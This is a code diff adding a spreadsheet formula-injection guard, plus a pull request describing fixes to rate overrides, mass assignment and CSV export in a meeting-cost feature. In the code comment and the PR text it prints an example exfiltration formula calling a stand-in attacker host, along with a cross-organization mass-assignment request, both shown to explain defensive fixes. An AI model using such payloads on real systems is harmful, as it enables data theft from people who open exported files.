+ * problem. A value beginning with `=`, `+`, `-`, `@`, tab or carriage return is
+ * a well-formed CSV string that Excel, LibreOffice Calc and Google Sheets
+ * evaluate as a **formula** when the file is opened:
+ *
+ *     name = '=HYPERLINK("https://evil.example/?d="&A1&B1,"Loading")'
+ *
+ * A member sets that as their display name; an admin exports the report and
+ * opens it; the formula runs with the admin's local privileges. Nothing in the
+ * CSV layer can prevent this, because the file is valid CSV — the defence has
+ * to be in the value.
+ *
+ * The standard mitigation (OWASP) is to prefix a leading tab so the cell is
+ * unambiguously text. A tab is used rather than a single quote because Excel
+ * consumes a leading `'` as its own "treat as text" marker and displays the
+ * rest, whereas a tab survives round-tripping back through a CSV parser: the
+ * value a consumer reads is the original with one tab in front, not a value
+ * that has been silently altered.
+ */
+
+/** Characters that begin a formula in at least one major spreadsheet app. */
+const FORMULA_PREFIXES = ["=", "+", "-", "@", "\t", "\r"];
+
+/**
+ * Returns `value` as a string that no spreadsheet will interpret as a formula.
+ *
+ * Non-string inputs are returned unchanged where they are already safe
+ * (numbers, booleans, null/undefined) so numeric columns stay numeric — quoting
+ * a number would turn a sortable column into text.
+ *
+ * @param {unknown} value
+ * @returns {unknown}
+ */
+export const neutralizeFormula = (value) => {
+  if (value === null || value === undefined) return value;
+  if (typeof value === "number" || typeof value === "boolean") return value;
+
+  const str = typeof value === "string" ? value : String(value);
+  if (str.length === 0) return str;
+
+  return FORMULA_PREFIXES.includes(str[0]) ? `\t${str}` : str;
+};
+
+/**
+ * Applies `neutralizeFormula` to every own enumerable property of a row.
+ *
+ * Used as `rows.map(neutralizeRow)` immediately before handing data to a CSV
+ * writer, so there is one obvious place where the guard is applied rather than
+ * a call per column.
+ *
+ * @param {object} row
+ * @returns {object}
+ */
+export const neutralizeRow = (row) => {
+  if (!row || typeof row !== "object") return row;
+
+  const out = {};
+  for (const [key, value] of Object.entries(row)) {
+    out[key] = neutralizeFormula(value);
+  }
+  return out;
+};
+
+export default { neutralizeFormula, neutralizeRow, FORMULA_PREFIXES };


### PR DESCRIPTION
# Pull Request

## Description

`MeetingCostConfig.memberRateOverrides` was a Mongoose `Map` whose keys are email addresses. Mongoose maps cannot have keys containing `"."`, and every real email address has one — in the domain.

The two write paths fail differently, and neither is visible to the caller:

```js
const cfg = new MeetingCostConfig({ organization: oid });

// Path A — direct .set(), what a caller would reach for
cfg.memberRateOverrides.set("jane.doe@example.com", 120);
// throws: Mongoose maps do not support keys that contain ".", got "jane.doe@example.com"

// Path B — what updateConfig actually does
Object.assign(cfg, { memberRateOverrides: { "jane.doe@example.com": 120 } });
// no throw
cfg.memberRateOverrides.get("jane.doe@example.com");      // undefined
cfg.toObject({ flattenMaps: true }).memberRateOverrides;  // {}

// A key with no dot works, isolating the cause
cfg.memberRateOverrides.set("janedoe@examplecom", 120);
cfg.memberRateOverrides.get("janedoe@examplecom");        // 120
```

`updateConfig` takes path B. So `PUT /api/meeting-cost/config` returns `200 { success: true }` with `memberRateOverrides: {}`, and there is nothing to distinguish that from a successful save except reading the field back and noticing it is empty.

Every calculation then falls back to `defaultHourlyRate`:

```js
const override = config.memberRateOverrides.get(participant.email);
if (override !== undefined) rate = override;
```

`.get()` on a real email always returns `undefined`, in `calculateMeetingCost`, `getOrganizationCostAnalytics` and `getMemberTimeAnalytics` alike. A senior engineer at £180/h and a contractor at £45/h are both costed at the £50 default. There is no partial failure to notice — the numbers are internally consistent, plausible, and wrong.

That is the entire point of the feature. Without overrides, `totalCost` is `defaultHourlyRate × participants × hours`, which is arithmetic the dashboard could do without a config model at all.

This is not a migration problem: every override an admin has ever tried to set was dropped at write time, so there is no data to migrate.

### The fix

Overrides become an array of `{ email, hourlyRate }` subdocuments. The address is stored verbatim, has no reserved-character rules, and can be validated. A `Map` keyed by user `_id` would also avoid the problem, but rates are configured against people an admin identifies by email and not every participant has a `User` row, so the array is the closer fit for how the feature is used.

Emails are normalized (trim + lowercase) on write **and** on lookup. `Map.get(participant.email)` was exact-match and case-sensitive, so an override entered as `Jane.Doe@Example.com` would not have applied to a participant recorded as `jane.doe@example.com` even if the map had worked — a second silent miss sitting behind the first.

Entries are validated: a well-formed address, a finite non-negative rate, no duplicates. A malformed entry is a `400` naming the offending value, not a silent drop — a silent drop is the bug this change exists to remove. `Number()` coerces `null`, `""`, `[]` and `false` to `0`, so a bare `Number.isFinite` check would have accepted "no rate" as a rate of zero; the check is explicit about that.

Reads go through `readMemberRateOverrides`, which still understands the old `Map` and plain-object shapes. In practice every stored map is empty, but the read path should not assume that.

### Three more defects in the same feature

**`updateConfig` was a mass assignment.** `Object.assign(config, req.body)` copied every key of the body onto the document, including `organization`:

```
PUT /api/meeting-cost/config
{ "organization": "<another org's id>", "defaultHourlyRate": 5 }
```

`organization` is `unique`, so if the target already had a config this failed with `E11000` reported as a generic `500`; if it did not, the caller's config was **re-parented onto an organization they do not belong to**, and `getConfig` lazily created a fresh default for their own org so nothing looked wrong from their side. `requireAdminOrOwner` gates the route, but it establishes that the caller administers *their own* organization, not the target. `createdAt`, `updatedAt` and `_id` were assignable for the same reason. It now takes an explicit allow-list.

**`exportCostReport` was a CSV injection sink.** `name` is a member's own display name, and `json2csv` escapes it correctly *for the CSV format* — which is exactly the problem. A value beginning with `=`, `+`, `-`, `@`, tab or CR is well-formed CSV that Excel, LibreOffice Calc and Google Sheets evaluate as a **formula** on open:

```
name = '=HYPERLINK("https://evil.example/?d="&A1&B1,"Loading")'
```

A member sets that as their display name; an admin exports the cost report and opens it; the formula runs with the admin's local privileges. A shared `neutralizeFormula` in `utils/csvSafety.js` prefixes a tab (the OWASP mitigation) so the cell is unambiguously text, leaving numbers and booleans untouched so numeric columns stay sortable. `auditLogExportService`'s `csvValue` had the identical gap and uses the same guard. **The `.xlsx` path needs no change** — ExcelJS writes typed string cells, and only an explicit `{ formula: … }` produces a formula.

**Bare `new mongoose.Types.ObjectId(orgId)`.** A session with no organization threw a raw `BSONError` that surfaced as `500 Server Error` rather than a 4xx.

## Type of Change

- [ ] New Feature
- [x] Bug Fix
- [ ] Documentation Update
- [ ] Refactor
- [ ] Performance Improvement
- [x] Security Improvement
- [ ] Other

## Related Issue

Closes #1161

## Testing

- [x] Tested locally
- [x] Existing functionality verified
- [x] No new warnings or errors

`server/tests/meetingCostRateOverrides.test.js` — 45 tests against `mongodb-memory-server`.

**Storage** — an override for `jane.doe@example.com` persists and survives a read back through `getConfig` (the first test is the whole bug in five lines); several addresses at once including subdomains and plus-addressing; the array form and the legacy object form both accepted; case and whitespace normalized on write; a second save replaces rather than merges; the set can be cleared.

**Validation** — four malformed addresses and four malformed rates each produce a `400` naming the problem (`null` among them, which `Number()` would otherwise turn into a free meeting); a duplicate differing only by case is rejected; **one bad entry in a batch persists nothing at all**.

**Cost calculation** — a participant is billed at their override rate (50 against `main`, 180 here); a mix of overridden and default participants totals correctly; a participant email differing only by case still matches; the prep-time multiplier composes with the override; no config falls back to the default; organization analytics use overrides too; an unusable org id rejects instead of throwing a `BSONError`.

**Mass assignment** — a body naming another organization updates only the caller's own config, creates nothing against the named org, and leaves exactly one config document; unknown fields are not stored; a negative default rate is a `400`; a session with no organization is `403` rather than `500`.

**CSV injection** — all six formula prefixes neutralized; ordinary values and email addresses untouched; numbers and booleans pass through as numbers and booleans; `null` / `undefined` / `""` preserved; a whole row guarded column-wise; a real `json2csv` render of a hostile display name contains `"\t=HYPERLINK(` and no cell begins `"=`; the audit-log row keeps its raw value while the written cell is neutralized.

**Backwards compatibility** — a legacy `Map`-shaped config and a legacy plain-object config both read correctly; a missing or malformed field yields an empty lookup rather than throwing; unusable legacy entries are dropped on read rather than crashing; `normalizeOverrideEmail` tolerates non-strings.

**Confirmed load-bearing.** With `main`'s controller and service restored — keeping the new model and `utils/csvSafety.js`, since the suite imports their helpers — **23 of the 45 fail**. The model change cannot be isolated further without the suite failing to load, so the standalone probe demonstrating the `Map` behaviour is in the issue body instead.

**Full server suite:** unchanged against `main` — 5 pre-existing suite failures and 1 pre-existing test failure on both, with 45 additional tests passing here.

> As with the other PRs in this batch: the declared `diff` dependency was not installed in my checkout, so I installed it locally with `--no-save` (`package.json` untouched) and took the `main` baseline in that same state.

## Screenshots

N/A — server-side. The visible change is that a rate entered in the cost settings is still there when the page is reloaded, and that the analytics figures move.

## Checklist

- [x] Code follows project conventions
- [x] Documentation updated where required
- [x] No unnecessary files included
- [x] Changes have been tested
- [x] Ready for review
